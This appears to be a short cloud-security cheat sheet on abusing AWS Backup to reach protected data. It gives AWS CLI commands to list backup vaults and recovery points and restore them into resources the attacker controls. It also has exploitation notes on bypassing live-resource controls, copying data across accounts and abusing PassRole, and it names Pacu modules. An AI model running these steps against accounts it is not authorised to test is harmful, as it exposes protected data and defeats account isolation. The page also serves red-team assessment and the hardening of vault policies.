AWS Backup centralises recovery points for EBS, RDS, DynamoDB, EFS, and more into backup vaults. A principal with backup read and restore permissions can enumerate those recovery points and restore them into resources it controls, reaching the protected data without touching the live source. Where a vault policy is over-broad or shared cross-account, the backups become an alternate door to everything they cover.
Enumerating vaults and recovery points#
aws backup list-backup-vaults --query 'BackupVaultList[].BackupVaultName'
aws backup list-recovery-points-by-backup-vault --backup-vault-name <vault> \
--query 'RecoveryPoints[].[RecoveryPointArn,ResourceType]'
aws backup get-backup-vault-access-policy --backup-vault-name <vault>
Restoring a recovery point#
# restore metadata tells you the required parameters for the resource type
aws backup get-recovery-point-restore-metadata \
--backup-vault-name <vault> --recovery-point-arn <arn>
aws backup start-restore-job --recovery-point-arn <arn> \
--iam-role-arn arn:aws:iam::<acct>:role/<restore-role> \
--metadata file://restore-params.json
The restored EBS volume, RDS instance, or DynamoDB table is yours to read.
Exploitation notes#
- Restoring sidesteps controls on the live resource: a database you cannot query directly is readable once its recovery point is restored into an instance you own.
- A cross-account vault access policy lets a recovery point be copied to your account, defeating source-account isolation.
start-restore-jobneeds a role it can pass; a weak restore role here is also a PassRole lever.
Tools#
- AWS CLI (
backup list-*,start-restore-job): enumerate and restore. - Pacu (
backup__*modules): session-based vault enumeration.